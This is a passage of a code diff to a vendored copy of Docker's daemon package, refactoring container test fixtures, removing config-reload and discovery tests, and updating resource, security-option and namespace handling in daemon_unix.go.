-			ID:   "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5",
-			Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
-		},
+		ID:   "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5",
+		Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
 	}
 
 	c5 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b",
-			Name: "d22d69a2b896",
-		},
+		ID:   "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b",
+		Name: "d22d69a2b896",
 	}
 
 	store := container.NewMemoryStore()
@@ -78,10 +65,15 @@ func TestGetContainer(t *testing.T) {
 	index.Add(c4.ID)
 	index.Add(c5.ID)
 
+	containersReplica, err := container.NewViewDB()
+	if err != nil {
+		t.Fatalf("could not create ViewDB: %v", err)
+	}
+
 	daemon := &Daemon{
-		containers: store,
-		idIndex:    index,
-		nameIndex:  registrar.NewRegistrar(),
+		containers:        store,
+		containersReplica: containersReplica,
+		idIndex:           index,
 	}
 
 	daemon.reserveName(c1.ID, c1.Name)
@@ -126,17 +118,10 @@ func initDaemonWithVolumeStore(tmp string) (*Daemon, error) {
 		repository: tmp,
 		root:       tmp,
 	}
-	daemon.volumes, err = store.New(tmp)
+	daemon.volumes, err = volumesservice.NewVolumeService(tmp, nil, idtools.IDPair{UID: 0, GID: 0}, daemon)
 	if err != nil {
 		return nil, err
 	}
-
-	volumesDriver, err := local.New(tmp, 0, 0)
-	if err != nil {
-		return nil, err
-	}
-	volumedrivers.Register(volumesDriver, volumesDriver.Name())
-
 	return daemon, nil
 }
 
@@ -158,6 +143,10 @@ func TestValidContainerNames(t *testing.T) {
 }
 
 func TestContainerInitDNS(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required") // for chown
+	}
+
 	tmp, err := ioutil.TempDir("", "docker-container-test-")
 	if err != nil {
 		t.Fatal(err)
@@ -187,7 +176,7 @@ func TestContainerInitDNS(t *testing.T) {
 "UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}`
 
 	// Container struct only used to retrieve path to config file
-	container := &container.Container{CommonContainer: container.CommonContainer{Root: containerPath}}
+	container := &container.Container{Root: containerPath}
 	configPath, err := container.ConfigPath()
 	if err != nil {
 		t.Fatal(err)
@@ -213,7 +202,6 @@ func TestContainerInitDNS(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	defer volumedrivers.Unregister(volume.DefaultDriverName)
 
 	c, err := daemon.load(containerID)
 	if err != nil {
@@ -314,314 +302,18 @@ func TestMerge(t *testing.T) {
 	}
 }
 
-func TestDaemonReloadLabels(t *testing.T) {
-	daemon := &Daemon{}
-	daemon.configStore = &Config{
-		CommonConfig: CommonConfig{
-			Labels: []string{"foo:bar"},
-		},
-	}
-
-	valuesSets := make(map[string]interface{})
-	valuesSets["labels"] = "foo:baz"
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			Labels:    []string{"foo:baz"},
-			valuesSet: valuesSets,
-		},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
-
-	label := daemon.configStore.Labels[0]
-	if label != "foo:baz" {
-		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
-	}
-}
-
-func TestDaemonReloadInsecureRegistries(t *testing.T) {
-	daemon := &Daemon{}
-	// initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000"
-	daemon.RegistryService = registry.NewService(registry.ServiceOptions{
-		InsecureRegistries: []string{
-			"127.0.0.0/8",
-			"10.10.1.11:5000",
-			"10.10.1.22:5000", // this will be removed when reloading
-			"docker1.com",
-			"docker2.com", // this will be removed when reloading
-		},
-	})
-
-	daemon.configStore = &Config{}
-
-	insecureRegistries := []string{
-		"127.0.0.0/8",     // this will be kept
-		"10.10.1.11:5000", // this will be kept
-		"10.10.1.33:5000", // this will be newly added
-		"docker1.com",     // this will be kept
-		"docker3.com",     // this will be newly added
-	}
-
-	valuesSets := make(map[string]interface{})
-	valuesSets["insecure-registries"] = insecureRegistries
-
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			ServiceOptions: registry.ServiceOptions{
-				InsecureRegistries: insecureRegistries,
-			},
-			valuesSet: valuesSets,
-		},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
-
-	// After Reload, daemon.RegistryService will be changed which is useful
-	// for registry communication in daemon.
-	registries := daemon.RegistryService.ServiceConfig()
-
-	// After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon.
-	// Then collect registries.InsecureRegistryCIDRs in dataMap.
-	// When collecting, we need to convert CIDRS into string as a key,
-	// while the times of key appears as value.
-	dataMap := map[string]int{}
-	for _, value := range registries.InsecureRegistryCIDRs {
-		if _, ok := dataMap[value.String()]; !ok {
-			dataMap[value.String()] = 1
-		} else {
-			dataMap[value.String()]++
-		}
-	}
-
-	for _, value := range registries.IndexConfigs {
-		if _, ok := dataMap[value.Name]; !ok {
-			dataMap[value.Name] = 1
-		} else {
-			dataMap[value.Name]++
-		}
-	}
-
-	// Finally compare dataMap with the original insecureRegistries.
-	// Each value in insecureRegistries should appear in daemon's insecure registries,
-	// and each can only appear exactly ONCE.
-	for _, r := range insecureRegistries {
-		if value, ok := dataMap[r]; !ok {
-			t.Fatalf("Expected daemon insecure registry %s, got none", r)
-		} else if value != 1 {
-			t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value)
-		}
-	}
-
-	// assert if "10.10.1.22:5000" is removed when reloading
-	if value, ok := dataMap["10.10.1.22:5000"]; ok {
-		t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value)
-	}
-
-	// assert if "docker2.com" is removed when reloading
-	if value, ok := dataMap["docker2.com"]; ok {
-		t.Fatalf("Expected no insecure registry of docker2.com, got %d", value)
-	}
-}
-
-func TestDaemonReloadNotAffectOthers(t *testing.T) {
-	daemon := &Daemon{}
-	daemon.configStore = &Config{
-		CommonConfig: CommonConfig{
-			Labels: []string{"foo:bar"},
-			Debug:  true,
-		},
-	}
-
-	valuesSets := make(map[string]interface{})
-	valuesSets["labels"] = "foo:baz"
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			Labels:    []string{"foo:baz"},
-			valuesSet: valuesSets,
-		},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
+func TestValidateContainerIsolation(t *testing.T) {
+	d := Daemon{}
 
-	label := daemon.configStore.Labels[0]
-	if label != "foo:baz" {
-		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
-	}
-	debug := daemon.configStore.Debug
-	if !debug {
-		t.Fatalf("Expected debug 'enabled', got 'disabled'")
-	}
+	_, err := d.verifyContainerSettings(runtime.GOOS, &containertypes.HostConfig{Isolation: containertypes.Isolation("invalid")}, nil, false)
+	assert.Check(t, is.Error(err, "invalid isolation 'invalid' on "+runtime.GOOS))
 }
 
-func TestDaemonDiscoveryReload(t *testing.T) {
-	daemon := &Daemon{}
-	daemon.configStore = &Config{
-		CommonConfig: CommonConfig{
-			ClusterStore:     "memory://127.0.0.1",
-			ClusterAdvertise: "127.0.0.1:3333",
-		},
-	}
-
-	if err := daemon.initDiscovery(daemon.configStore); err != nil {
-		t.Fatal(err)
+func TestFindNetworkErrorType(t *testing.T) {
+	d := Daemon{}
+	_, err := d.FindNetwork("fakeNet")
+	_, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork)
+	if !errdefs.IsNotFound(err) || !ok {
+		t.Error("The FindNetwork method MUST always return an error that implements the NotFound interface and is ErrNoSuchNetwork")
 	}
-
-	expected := discovery.Entries{
-		&discovery.Entry{Host: "127.0.0.1", Port: "3333"},
-	}
-
-	select {
-	case <-time.After(10 * time.Second):
-		t.Fatal("timeout waiting for discovery")
-	case <-daemon.discoveryWatcher.ReadyCh():
-	}
-
-	stopCh := make(chan struct{})
-	defer close(stopCh)
-	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
-
-	select {
-	case <-time.After(1 * time.Second):
-		t.Fatal("failed to get discovery advertisements in time")
-	case e := <-ch:
-		if !reflect.DeepEqual(e, expected) {
-			t.Fatalf("expected %v, got %v\n", expected, e)
-		}
-	case e := <-errCh:
-		t.Fatal(e)
-	}
-
-	valuesSets := make(map[string]interface{})
-	valuesSets["cluster-store"] = "memory://127.0.0.1:2222"
-	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			ClusterStore:     "memory://127.0.0.1:2222",
-			ClusterAdvertise: "127.0.0.1:5555",
-			valuesSet:        valuesSets,
-		},
-	}
-
-	expected = discovery.Entries{
-		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
-
-	select {
-	case <-time.After(10 * time.Second):
-		t.Fatal("timeout waiting for discovery")
-	case <-daemon.discoveryWatcher.ReadyCh():
-	}
-
-	ch, errCh = daemon.discoveryWatcher.Watch(stopCh)
-
-	select {
-	case <-time.After(1 * time.Second):
-		t.Fatal("failed to get discovery advertisements in time")
-	case e := <-ch:
-		if !reflect.DeepEqual(e, expected) {
-			t.Fatalf("expected %v, got %v\n", expected, e)
-		}
-	case e := <-errCh:
-		t.Fatal(e)
-	}
-}
-
-func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) {
-	daemon := &Daemon{}
-	daemon.configStore = &Config{}
-
-	valuesSet := make(map[string]interface{})
-	valuesSet["cluster-store"] = "memory://127.0.0.1:2222"
-	valuesSet["cluster-advertise"] = "127.0.0.1:5555"
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			ClusterStore:     "memory://127.0.0.1:2222",
-			ClusterAdvertise: "127.0.0.1:5555",
-			valuesSet:        valuesSet,
-		},
-	}
-
-	expected := discovery.Entries{
-		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
-
-	select {
-	case <-time.After(10 * time.Second):
-		t.Fatal("timeout waiting for discovery")
-	case <-daemon.discoveryWatcher.ReadyCh():
-	}
-
-	stopCh := make(chan struct{})
-	defer close(stopCh)
-	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
-
-	select {
-	case <-time.After(1 * time.Second):
-		t.Fatal("failed to get discovery advertisements in time")
-	case e := <-ch:
-		if !reflect.DeepEqual(e, expected) {
-			t.Fatalf("expected %v, got %v\n", expected, e)
-		}
-	case e := <-errCh:
-		t.Fatal(e)
-	}
-}
-
-func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) {
-	daemon := &Daemon{}
-	daemon.configStore = &Config{
-		CommonConfig: CommonConfig{
-			ClusterStore: "memory://127.0.0.1",
-		},
-	}
-	valuesSets := make(map[string]interface{})
-	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
-	newConfig := &Config{
-		CommonConfig: CommonConfig{
-			ClusterAdvertise: "127.0.0.1:5555",
-			valuesSet:        valuesSets,
-		},
-	}
-	expected := discovery.Entries{
-		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
-	}
-
-	if err := daemon.Reload(newConfig); err != nil {
-		t.Fatal(err)
-	}
-
-	select {
-	case <-daemon.discoveryWatcher.ReadyCh():
-	case <-time.After(10 * time.Second):
-		t.Fatal("Timeout waiting for discovery")
-	}
-	stopCh := make(chan struct{})
-	defer close(stopCh)
-	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
-
-	select {
-	case <-time.After(1 * time.Second):
-		t.Fatal("failed to get discovery advertisements in time")
-	case e := <-ch:
-		if !reflect.DeepEqual(e, expected) {
-			t.Fatalf("expected %v, got %v\n", expected, e)
-		}
-	case e := <-errCh:
-		t.Fatal(e)
-	}
-
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go
index 5b3ffeb72d..e2c77610d4 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_unix.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go
@@ -1,9 +1,10 @@
 // +build linux freebsd
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"bytes"
+	"bufio"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net"
@@ -13,22 +14,26 @@ import (
 	"runtime/debug"
 	"strconv"
 	"strings"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	containerd_cgroups "github.com/containerd/cgroups"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/blkiodev"
 	pblkiodev "github.com/docker/docker/api/types/blkiodev"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/image"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/initlayer"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
 	"github.com/docker/docker/pkg/parsers/kernel"
 	"github.com/docker/docker/pkg/sysinfo"
 	"github.com/docker/docker/runconfig"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
+	volumemounts "github.com/docker/docker/volume/mounts"
 	"github.com/docker/libnetwork"
 	nwconfig "github.com/docker/libnetwork/config"
 	"github.com/docker/libnetwork/drivers/bridge"
@@ -36,16 +41,25 @@ import (
 	"github.com/docker/libnetwork/netutils"
 	"github.com/docker/libnetwork/options"
 	lntypes "github.com/docker/libnetwork/types"
-	"github.com/golang/protobuf/ptypes"
 	"github.com/opencontainers/runc/libcontainer/cgroups"
-	"github.com/opencontainers/runc/libcontainer/label"
 	rsystem "github.com/opencontainers/runc/libcontainer/system"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/selinux/go-selinux/label"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 	"github.com/vishvananda/netlink"
+	"golang.org/x/sys/unix"
 )
 
 const (
+	// DefaultShimBinary is the default shim to be used by containerd if none
+	// is specified
+	DefaultShimBinary = "docker-containerd-shim"
+
+	// DefaultRuntimeBinary is the default runtime to be used by
+	// containerd if none is specified
+	DefaultRuntimeBinary = "docker-runc"
+
 	// See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269
 	linuxMinCPUShares = 2
 	linuxMaxCPUShares = 262144
@@ -53,30 +67,35 @@ const (
 	// It's not kernel limit, we want this 4M limit to supply a reasonable functional container
 	linuxMinMemory = 4194304
 	// constants for remapped root settings
-	defaultIDSpecifier string = "default"
-	defaultRemappedID  string = "dockremap"
+	defaultIDSpecifier = "default"
+	defaultRemappedID  = "dockremap"
 
 	// constant for cgroup drivers
 	cgroupFsDriver      = "cgroupfs"
 	cgroupSystemdDriver = "systemd"
+
+	// DefaultRuntimeName is the default runtime to be used by
+	// containerd if none is specified
+	DefaultRuntimeName = "docker-runc"
 )
 
-func getMemoryResources(config containertypes.Resources) *specs.Memory {
-	memory := specs.Memory{}
+type containerGetter interface {
+	GetContainer(string) (*container.Container, error)
+}
+
+func getMemoryResources(config containertypes.Resources) *specs.LinuxMemory {
+	memory := specs.LinuxMemory{}
 
 	if config.Memory > 0 {
-		limit := uint64(config.Memory)
-		memory.Limit = &limit
+		memory.Limit = &config.Memory
 	}
 
 	if config.MemoryReservation > 0 {
-		reservation := uint64(config.MemoryReservation)
-		memory.Reservation = &reservation
+		memory.Reservation = &config.MemoryReservation
 	}
 
-	if config.MemorySwap != 0 {
-		swap := uint64(config.MemorySwap)
-		memory.Swap = &swap
+	if config.MemorySwap > 0 {
+		memory.Swap = &config.MemorySwap
 	}
 
 	if config.MemorySwappiness != nil {
@@ -84,36 +103,40 @@ func getMemoryResources(config containertypes.Resources) *specs.Memory {
 		memory.Swappiness = &swappiness
 	}
 
+	if config.OomKillDisable != nil {
+		memory.DisableOOMKiller = config.OomKillDisable
+	}
+
 	if config.KernelMemory != 0 {
-		kernelMemory := uint64(config.KernelMemory)
-		memory.Kernel = &kernelMemory
+		memory.Kernel = &config.KernelMemory
 	}
 
 	return &memory
 }
 
-func getCPUResources(config containertypes.Resources) *specs.CPU {
-	cpu := specs.CPU{}
+func getCPUResources(config containertypes.Resources) (*specs.LinuxCPU, error) {
+	cpu := specs.LinuxCPU{}
 
-	if config.CPUShares != 0 {
+	if config.CPUShares < 0 {
+		return nil, fmt.Errorf("shares: invalid argument")
+	}
+	if config.CPUShares >= 0 {
 		shares := uint64(config.CPUShares)
 		cpu.Shares = &shares
 	}
 
 	if config.CpusetCpus != "" {
-		cpuset := config.CpusetCpus
-		cpu.Cpus = &cpuset
+		cpu.Cpus = config.CpusetCpus
 	}
 
 	if config.CpusetMems != "" {
-		cpuset := config.CpusetMems
-		cpu.Mems = &cpuset
+		cpu.Mems = config.CpusetMems
 	}
 
 	if config.NanoCPUs > 0 {
 		// https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt
 		period := uint64(100 * time.Millisecond / time.Microsecond)
-		quota := uint64(config.NanoCPUs) * period / 1e9
+		quota := config.NanoCPUs * int64(period) / 1e9
 		cpu.Period = &period
 		cpu.Quota = &quota
 	}
@@ -124,8 +147,8 @@ func getCPUResources(config containertypes.Resources) *specs.CPU {
 	}
 
 	if config.CPUQuota != 0 {
-		quota := uint64(config.CPUQuota)
-		cpu.Quota = &quota
+		q := config.CPUQuota
+		cpu.Quota = &q
 	}
 
 	if config.CPURealtimePeriod != 0 {
@@ -134,23 +157,23 @@ func getCPUResources(config containertypes.Resources) *specs.CPU {
 	}
 
 	if config.CPURealtimeRuntime != 0 {
-		runtime := uint64(config.CPURealtimeRuntime)
-		cpu.RealtimeRuntime = &runtime
+		c := config.CPURealtimeRuntime
+		cpu.RealtimeRuntime = &c
 	}
 
-	return &cpu
+	return &cpu, nil
 }
 
-func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) {
-	var stat syscall.Stat_t
-	var blkioWeightDevices []specs.WeightDevice
+func getBlkioWeightDevices(config containertypes.Resources) ([]specs.LinuxWeightDevice, error) {
+	var stat unix.Stat_t
+	var blkioWeightDevices []specs.LinuxWeightDevice
 
 	for _, weightDevice := range config.BlkioWeightDevice {
-		if err := syscall.Stat(weightDevice.Path, &stat); err != nil {
+		if err := unix.Stat(weightDevice.Path, &stat); err != nil {
 			return nil, err
 		}
 		weight := weightDevice.Weight
-		d := specs.WeightDevice{Weight: &weight}
+		d := specs.LinuxWeightDevice{Weight: &weight}
 		d.Major = int64(stat.Rdev / 256)
 		d.Minor = int64(stat.Rdev % 256)
 		blkioWeightDevices = append(blkioWeightDevices, d)
@@ -159,6 +182,11 @@ func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevic
 	return blkioWeightDevices, nil
 }
 
+func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	container.NoNewPrivileges = daemon.configStore.NoNewPrivileges
+	return parseSecurityOpt(container, hostConfig)
+}
+
 func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
 	var (
 		labelOpts []string
@@ -170,15 +198,18 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos
 			container.NoNewPrivileges = true
 			continue
 		}
+		if opt == "disable" {
+			labelOpts = append(labelOpts, "disable")
+			continue
+		}
 
 		var con []string
 		if strings.Contains(opt, "=") {
 			con = strings.SplitN(opt, "=", 2)
 		} else if strings.Contains(opt, ":") {
 			con = strings.SplitN(opt, ":", 2)
-			logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.")
+			logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 17.04, use `=` instead.")
 		}
-
 		if len(con) != 2 {
 			return fmt.Errorf("invalid --security-opt 1: %q", opt)
 		}
@@ -190,6 +221,12 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos
 			container.AppArmorProfile = con[1]
 		case "seccomp":
 			container.SeccompProfile = con[1]
+		case "no-new-privileges":
+			noNewPrivileges, err := strconv.ParseBool(con[1])
+			if err != nil {
+				return fmt.Errorf("invalid --security-opt 2: %q", opt)
+			}
+			container.NoNewPrivileges = noNewPrivileges
 		default:
 			return fmt.Errorf("invalid --security-opt 2: %q", opt)
 		}
@@ -199,16 +236,15 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos
 	return err
 }
 
-func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) {
-	var throttleDevices []specs.ThrottleDevice
-	var stat syscall.Stat_t
+func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.LinuxThrottleDevice, error) {
+	var throttleDevices []specs.LinuxThrottleDevice
+	var stat unix.Stat_t
 
 	for _, d := range devs {
-		if err := syscall.Stat(d.Path, &stat); err != nil {
+		if err := unix.Stat(d.Path, &stat); err != nil {
 			return nil, err
 		}
-		rate := d.Rate
-		d := specs.ThrottleDevice{Rate: &rate}
+		d := specs.LinuxThrottleDevice{Rate: d.Rate}
 		d.Major = int64(stat.Rdev / 256)
 		d.Minor = int64(stat.Rdev % 256)
 		throttleDevices = append(throttleDevices, d)
@@ -254,18 +290,28 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf
 		hostConfig.MemorySwap = hostConfig.Memory * 2
 	}
 	if hostConfig.ShmSize == 0 {
-		hostConfig.ShmSize = container.DefaultSHMSize
+		hostConfig.ShmSize = config.DefaultShmSize
+		if daemon.configStore != nil {
+			hostConfig.ShmSize = int64(daemon.configStore.ShmSize)
+		}
+	}
+	// Set default IPC mode, if unset for container
+	if hostConfig.IpcMode.IsEmpty() {
+		m := config.DefaultIpcMode
+		if daemon.configStore != nil {
+			m = daemon.configStore.IpcMode
+		}
+		hostConfig.IpcMode = containertypes.IpcMode(m)
 	}
+
+	adaptSharedNamespaceContainer(daemon, hostConfig)
+
 	var err error
-	opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged)
+	opts, err := daemon.generateSecurityOpt(hostConfig)
 	if err != nil {
 		return err
 	}
 	hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...)
-	if hostConfig.MemorySwappiness == nil {
-		defaultSwappiness := int64(-1)
-		hostConfig.MemorySwappiness = &defaultSwappiness
-	}
 	if hostConfig.OomKillDisable == nil {
 		defaultOomKillDisable := false
 		hostConfig.OomKillDisable = &defaultOomKillDisable
@@ -274,8 +320,39 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf
 	return nil
 }
 
+// adaptSharedNamespaceContainer replaces container name with its ID in hostConfig.
+// To be more precisely, it modifies `container:name` to `container:ID` of PidMode, IpcMode
+// and NetworkMode.
+//
+// When a container shares its namespace with another container, use ID can keep the namespace
+// sharing connection between the two containers even the another container is renamed.
+func adaptSharedNamespaceContainer(daemon containerGetter, hostConfig *containertypes.HostConfig) {
+	containerPrefix := "container:"
+	if hostConfig.PidMode.IsContainer() {
+		pidContainer := hostConfig.PidMode.Container()
+		// if there is any error returned here, we just ignore it and leave it to be
+		// handled in the following logic
+		if c, err := daemon.GetContainer(pidContainer); err == nil {
+			hostConfig.PidMode = containertypes.PidMode(containerPrefix + c.ID)
+		}
+	}
+	if hostConfig.IpcMode.IsContainer() {
+		ipcContainer := hostConfig.IpcMode.Container()
+		if c, err := daemon.GetContainer(ipcContainer); err == nil {
+			hostConfig.IpcMode = containertypes.IpcMode(containerPrefix + c.ID)
+		}
+	}
+	if hostConfig.NetworkMode.IsContainer() {
+		netContainer := hostConfig.NetworkMode.ConnectedContainer()
+		if c, err := daemon.GetContainer(netContainer); err == nil {
+			hostConfig.NetworkMode = containertypes.NetworkMode(containerPrefix + c.ID)
+		}
+	}
+}
+
 func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) {
 	warnings := []string{}
+	fixMemorySwappiness(resources)
 
 	// memory subsystem checks and adjustments
 	if resources.Memory != 0 && resources.Memory < linuxMinMemory {
@@ -298,14 +375,14 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi
 	if resources.Memory == 0 && resources.MemorySwap > 0 && !update {
 		return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage")
 	}
-	if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness {
+	if resources.MemorySwappiness != nil && !sysInfo.MemorySwappiness {
 		warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.")
 		logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. Memory swappiness discarded.")
 		resources.MemorySwappiness = nil
 	}
 	if resources.MemorySwappiness != nil {
 		swappiness := *resources.MemorySwappiness
-		if swappiness < -1 || swappiness > 100 {
+		if swappiness < 0 || swappiness > 100 {
 			return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness)
 		}
 	}
@@ -444,6 +521,7 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi
 		warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.")
 		logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.")
 		resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{}
+
 	}
 	if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice {
 		warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.")
@@ -469,7 +547,7 @@ func (daemon *Daemon) getCgroupDriver() string {
 }
 
 // getCD gets the raw value of the native.cgroupdriver option, if set.
-func getCD(config *Config) string {
+func getCD(config *config.Config) string {
 	for _, option := range config.ExecOptions {
 		key, val, err := parsers.ParseKeyValueOpt(option)
 		if err != nil || !strings.EqualFold(key, "native.cgroupdriver") {
@@ -481,7 +559,7 @@ func getCD(config *Config) string {
 }
 
 // VerifyCgroupDriver validates native.cgroupdriver
-func VerifyCgroupDriver(config *Config) error {
+func VerifyCgroupDriver(config *config.Config) error {
 	cd := getCD(config)
 	if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver {
 		return nil
@@ -490,21 +568,16 @@ func VerifyCgroupDriver(config *Config) error {
 }
 
 // UsingSystemd returns true if cli option includes native.cgroupdriver=systemd
-func UsingSystemd(config *Config) bool {
+func UsingSystemd(config *config.Config) bool {
 	return getCD(config) == cgroupSystemdDriver
 }
 
 // verifyPlatformContainerSettings performs platform-specific validation of the
 // hostconfig and config structures.
 func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
-	warnings := []string{}
+	var warnings []string
 	sysInfo := sysinfo.New(true)
 
-	warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config)
-	if err != nil {
-		return warnings, err
-	}
-
 	w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update)
 
 	// no matter err is nil or not, w could have data in itself.
@@ -530,13 +603,13 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.
 	// check for various conflicting options with user namespaces
 	if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() {
 		if hostConfig.Privileged {
-			return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces")
+			return warnings, fmt.Errorf("privileged mode is incompatible with user namespaces.  You must run the container in the host namespace when running privileged mode")
 		}
 		if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() {
-			return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled")
+			return warnings, fmt.Errorf("cannot share the host's network namespace when user namespaces are enabled")
 		}
 		if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() {
-			return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled")
+			return warnings, fmt.Errorf("cannot share the host PID namespace when user namespaces are enabled")
 		}
 	}
 	if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) {
@@ -553,64 +626,92 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.
 		return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime)
 	}
 
+	parser := volumemounts.NewParser(runtime.GOOS)
+	for dest := range hostConfig.Tmpfs {
+		if err := parser.ValidateTmpfsMountDestination(dest); err != nil {
+			return warnings, err
+		}
+	}
+
 	return warnings, nil
 }
 
-// platformReload update configuration with platform specific options
-func (daemon *Daemon) platformReload(config *Config) map[string]string {
-	if config.IsValueSet("runtimes") {
-		daemon.configStore.Runtimes = config.Runtimes
-		// Always set the default one
-		daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary}
-	}
+func (daemon *Daemon) loadRuntimes() error {
+	return daemon.initRuntimes(daemon.configStore.Runtimes)
+}
 
-	if config.DefaultRuntime != "" {
-		daemon.configStore.DefaultRuntime = config.DefaultRuntime
+func (daemon *Daemon) initRuntimes(runtimes map[string]types.Runtime) (err error) {
